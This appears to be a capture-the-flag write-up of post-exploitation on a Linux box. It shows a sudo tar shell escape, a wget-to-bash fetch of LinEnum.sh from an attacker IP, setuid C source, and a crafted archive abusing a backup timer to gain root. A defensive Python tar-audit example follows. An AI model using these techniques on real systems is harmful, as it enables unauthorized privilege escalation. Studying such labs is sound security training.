# Post Exploitation

## Elevating Privileges

Running the following command lists the commands we can execute through sudo without a password:

```
sudo -l
```

![Looks like we can run /bin/tar](/files/-MLDDEGyEwHXG4RMD1vU)

{% embed url="<https://gtfobins.github.io/gtfobins/tar/#sudo>" %}

Reading the tar manual, it turns out we can actually use tar to spawn a shell, wtf?!

```
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```

![](/files/-MLDEx61wCj59qOj8sL5)

## Post Exploitation Enumeration

```
wget -qO- http://10.10.14.34:80/LinEnum.sh | bash
```

![](/files/-MLhL1JZCEhLob0GOvz_)

The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.

```
$ locate backuper
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer

```

{% embed url="<https://ranakhalil101.medium.com/hack-the-box-tartarsauce-writeup-w-o-metasploit-e73393d4a0cd>" %}


Create a file called setuid.c on our attacker machine:

```
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}
```

```
gcc -m32 -o setuid setuid.c
```

{% embed url="<https://medium.com/@falconspy/useful-oscp-notes-commands-d71b5eda7b02>" %}

```
chmod u+s setuid

root@kali:/var/www/html# ls -l
total 776
-rw-r--r-- 1 root root  10701 May  8  2020 index.html
-rw-r--r-- 1 root root    612 May  8  2020 index.nginx-debian.html
-rwxr-xr-x 1 root root  46631 Oct 15 08:39 LinEnum.sh
-rw-r--r-- 1 root root 706130 Aug 24 17:17 Resume.pdf
-rwsr-xr-x 1 root root  15520 Nov  9 09:22 setuid
-rw-r--r-- 1 root root    110 Nov  9 09:18 setuid.c
-rw-r--r-- 1 root root      0 Aug 10 22:02 test.py

```

Compress the var directory and save it to a file called exploit:

```
tar -zcvf exploit var
```

Copy it to /var/tmp on our target machine:

```
# attack machine
python -m SimpleHTTPServer 80

# target machine
wget http://10.10.14.34:80/exploit
```

Check when the timer runs next with:

```
systemctl list-timers
```

![](/files/-MLhbwgIi-Act9kcXAS-)
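
Seen from the defending side, the approach above depends on a scheduled job unpacking an archive with the mode bits stored inside it. The following is an added example, not part of the original writeup: Python that flags setuid/setgid members in an archive and extracts with those bits cleared. The sample archive, its contents and all function names are constructed for illustration.

```python
import io
import stat
import tarfile

SPECIAL_BITS = stat.S_ISUID | stat.S_ISGID | stat.S_ISVTX


def build_sample_archive() -> bytes:
    """Constructed sample: gzip'd tar holding one root-owned setuid file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, mode in (("var/www/html/index.html", 0o644),
                           ("var/www/html/setuid", 0o4755)):
            data = b"constructed placeholder, not a real binary\n"
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), mode
            info.uid = info.gid = 0
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def audit_archive(raw: bytes) -> list:
    """Return (name, octal mode, uid) for members with setuid/setgid set."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(raw), mode="r:*") as tar:
        for m in tar:
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((m.name, oct(m.mode), m.uid))
    return findings


def extract_without_special_bits(raw: bytes, dest: str) -> None:
    """Extract with setuid/setgid/sticky cleared on every member."""
    # Python's "data" extraction filter (where available) also ignores
    # archive ownership; the explicit mask covers older interpreters.
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(fileobj=io.BytesIO(raw), mode="r:*") as tar:
        members = tar.getmembers()
        for m in members:
            m.mode &= ~SPECIAL_BITS
        tar.extractall(dest, members=members, **extra)


if __name__ == "__main__":
    for name, mode, uid in audit_archive(build_sample_archive()):
        print(f"privileged member: {name} mode={mode} uid={uid}")
```

A backup or restore job can run the audit before unpacking anything it did not create itself and refuse archives that return findings.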


